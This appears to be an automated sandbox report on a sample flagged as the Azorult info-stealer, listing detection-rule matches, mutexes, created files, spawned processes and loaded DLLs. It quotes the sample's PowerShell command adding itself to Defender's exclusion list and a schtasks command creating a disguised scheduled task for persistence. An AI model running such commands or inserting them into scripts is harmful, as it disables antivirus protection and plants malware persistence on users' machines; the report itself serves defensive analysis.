Source: 0.2.A2h6QhZIKx.exe.38a1140.3.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 0.2.A2h6QhZIKx.exe.38a1140.3.raw.unpack, type: UNPACKEDPE	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.888053414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 00000007.00000002.888053414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
Source: 00000007.00000002.888053414.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.964259993.00000000036FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
Source: 00000000.00000002.964259993.00000000036FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research

Source: 0.2.A2h6QhZIKx.exe.3901560.2.raw.unpack, axawa0e8J13q1G2Nlm.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.A2h6QhZIKx.exe.3901560.2.raw.unpack, axawa0e8J13q1G2Nlm.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.A2h6QhZIKx.exe.3901560.2.raw.unpack, axawa0e8J13q1G2Nlm.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.A2h6QhZIKx.exe.38a1140.3.raw.unpack, axawa0e8J13q1G2Nlm.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.A2h6QhZIKx.exe.38a1140.3.raw.unpack, axawa0e8J13q1G2Nlm.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.A2h6QhZIKx.exe.38a1140.3.raw.unpack, axawa0e8J13q1G2Nlm.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.A2h6QhZIKx.exe.38a1140.3.raw.unpack, XHI4wFo5Lxm6mj08UD.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.A2h6QhZIKx.exe.38a1140.3.raw.unpack, XHI4wFo5Lxm6mj08UD.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.A2h6QhZIKx.exe.51f0000.5.raw.unpack, axawa0e8J13q1G2Nlm.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.A2h6QhZIKx.exe.51f0000.5.raw.unpack, axawa0e8J13q1G2Nlm.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.A2h6QhZIKx.exe.51f0000.5.raw.unpack, axawa0e8J13q1G2Nlm.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.A2h6QhZIKx.exe.51f0000.5.raw.unpack, XHI4wFo5Lxm6mj08UD.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.A2h6QhZIKx.exe.51f0000.5.raw.unpack, XHI4wFo5Lxm6mj08UD.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.A2h6QhZIKx.exe.3901560.2.raw.unpack, XHI4wFo5Lxm6mj08UD.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.A2h6QhZIKx.exe.3901560.2.raw.unpack, XHI4wFo5Lxm6mj08UD.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@18/28@1/2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 7_2_0040A4A4 CoCreateInstance,

7_2_0040A4A4

Source: C:\Users\user\Desktop\A2h6QhZIKx.exe

File created: C:\Users\user\AppData\Roaming\lpIWQr.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6964:120:WilError_03
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1204:120:WilError_03
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Mutant created: \Sessions\1\BaseNamedObjects\YqDEOdfzZrVcgaBxUDEUBd
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2372
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Mutant created: \Sessions\1\BaseNamedObjects\AFA7A44E6-9414907A-77BDA8E2-F79707E2-2C294959
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6784:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6448

Source: C:\Users\user\Desktop\A2h6QhZIKx.exe

File created: C:\Users\user\AppData\Local\Temp\tmp263E.tmp

Jump to behavior

Source: A2h6QhZIKx.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: A2h6QhZIKx.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\A2h6QhZIKx.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\A2h6QhZIKx.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: A2h6QhZIKx.exe	Virustotal: Detection: 66%
Source: A2h6QhZIKx.exe	ReversingLabs: Detection: 60%

Source: C:\Users\user\Desktop\A2h6QhZIKx.exe

File read: C:\Users\user\Desktop\A2h6QhZIKx.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\A2h6QhZIKx.exe "C:\Users\user\Desktop\A2h6QhZIKx.exe"
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\A2h6QhZIKx.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lpIWQr.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lpIWQr" /XML "C:\Users\user\AppData\Local\Temp\tmp263E.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6448 -s 1784
Source: unknown	Process created: C:\Users\user\AppData\Roaming\lpIWQr.exe C:\Users\user\AppData\Roaming\lpIWQr.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2372 -s 1312
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\A2h6QhZIKx.exe"	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lpIWQr.exe"	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lpIWQr" /XML "C:\Users\user\AppData\Local\Temp\tmp263E.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior

Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\A2h6QhZIKx.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lpIWQr.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
